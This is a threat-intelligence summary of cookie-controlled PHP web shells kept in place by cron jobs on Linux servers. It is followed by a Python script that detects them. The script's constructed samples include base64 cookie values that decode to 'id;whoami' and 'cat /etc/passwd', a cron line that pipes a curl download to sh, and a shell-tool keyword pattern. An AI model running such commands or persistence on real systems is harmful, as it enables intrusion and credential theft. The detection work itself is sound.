Microsoft Details Cookie-Controlled PHP Web Shells Persisting via Cron on Linux Servers
Summary
The Microsoft Defender Security Research team reports threat actors using HTTP cookie values as the command channel for PHP web shells on compromised Linux servers, with cron jobs used to keep the shells in place. The shell reads its command from a cookie rather than from a URL parameter or the request body, so the request looks like ordinary traffic to an ordinary page and the command never appears in default web server access logs, which record the request line but not cookie headers.
IFF Assessment
This is bad news for defenders: the technique is stealthier than a conventional web shell because cookie values are rarely logged or inspected, so WAF rules, proxy inspection and log review tuned to URL parameters and POST bodies will not see the commands.
Defender Context
Defenders should log and inspect cookie headers on requests to PHP resources (most access-log formats omit them by default), alert on cookie values that decode to shell syntax or that are sent only to a single unusual script, and audit cron entries for the web server account and any job that executes files in web-writable directories. Hardening the web server configuration to prevent the initial upload or write of a web shell remains the primary control. The case shows that detection must cover application-layer fields beyond the URL and the request body.
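As a worked example of the detection the Summary and Defender Context describe, the script below flags cookie values on requests to PHP pages that decode to shell commands, and cron entries that look like web-shell persistence. This is added example code, not Microsoft's tooling or anything from the report; the access-log lines, cookie names, crontab and the list of web-writable directories are all constructed for the example, and the log format assumes cookies have been added to Apache's LogFormat with `%{Cookie}i`.

```python
"""Detect cookie-borne shell commands to PHP pages and cron-based persistence.

Added example (not Microsoft's code). All sample data below is constructed.
"""
import base64
import binascii
import re

# Constructed Apache log. Assumes cookies are logged, e.g.
#   LogFormat "%h %t \"%r\" %>s \"%{Cookie}i\"" withcookie
# The default "combined" format does not include cookies at all, which is
# why this control channel is normally invisible in log review.
SAMPLE_LOG = """\
203.0.113.7 [12/Jan/2025:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 "PHPSESSID=8f1c2a; theme=dark"
203.0.113.7 [12/Jan/2025:10:01:09 +0000] "GET /uploads/img.php HTTP/1.1" 200 "PHPSESSID=8f1c2a; sid=aWQ7d2hvYW1p"
198.51.100.3 [12/Jan/2025:10:02:44 +0000] "POST /contact.php HTTP/1.1" 200 "PHPSESSID=91aa7f"
203.0.113.7 [12/Jan/2025:10:03:15 +0000] "GET /uploads/img.php HTTP/1.1" 200 "PHPSESSID=8f1c2a; sid=Y2F0IC9ldGMvcGFzc3dk"
"""

LOG_RE = re.compile(r'^(\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) "([^"]*)"$')

# Command words (at the start or after a shell separator) and shell
# metacharacters that a legitimate session or preference cookie never carries.
SHELL_RE = re.compile(
    r'(^|[\s;|&`$(])(id|whoami|uname|cat|ls|wget|curl|bash|sh|perl|python|nc|crontab)\b'
    r'|[;|`]')


def decode_base64(value):
    """Return the decoded text if value is base64 of printable ASCII, else None."""
    padded = value + "=" * (-len(value) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def parse_cookies(header):
    """Split a Cookie header into (name, value) pairs."""
    pairs = []
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            pairs.append((name, value))
    return pairs


def find_cookie_commands(log_text):
    """Return (client, path, cookie, command) for each cookie on a request to a
    PHP page whose raw or base64-decoded value looks like a shell command."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _ts, _method, path, _status, cookies = m.groups()
        if not path.split("?")[0].endswith(".php"):
            continue
        for name, value in parse_cookies(cookies):
            for candidate in (value, decode_base64(value)):
                if candidate and SHELL_RE.search(candidate):
                    hits.append((client, path, name, candidate))
                    break
    return hits


# Constructed crontab for the web server account (e.g. `crontab -u www-data -l`).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/php /var/www/html/cron/cleanup.php
*/5 * * * * /usr/bin/php /var/www/html/uploads/img.php >/dev/null 2>&1
*/10 * * * * curl -s http://203.0.113.7/x | sh
"""

# Directories the web server account can write to on this hypothetical host;
# a cron job executing anything stored there is a persistence red flag.
WEB_WRITABLE = ("/var/www/html/uploads/", "/tmp/", "/dev/shm/")
PIPE_TO_SHELL_RE = re.compile(r'\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b')


def find_suspicious_cron(crontab_text):
    """Return cron lines that run code from web-writable paths or pipe a download to sh."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if any(d in line for d in WEB_WRITABLE) or PIPE_TO_SHELL_RE.search(line):
            hits.append(line)
    return hits


if __name__ == "__main__":
    for hit in find_cookie_commands(SAMPLE_LOG):
        print("cookie command:", hit)
    for line in find_suspicious_cron(SAMPLE_CRONTAB):
        print("suspicious cron:", line)
```

Run against the sample data, the two requests to /uploads/img.php are reported because their `sid` cookie decodes to `id;whoami` and `cat /etc/passwd`, while the session and theme cookies decode to non-text and are ignored; the cron audit reports the job running a PHP file from the uploads directory and the curl-to-sh job. The base64 step matters because a raw-value check alone sees only an opaque token; real shells may also use other encodings or XOR, so treat this as a starting point and tune the command list and writable-directory list to the host.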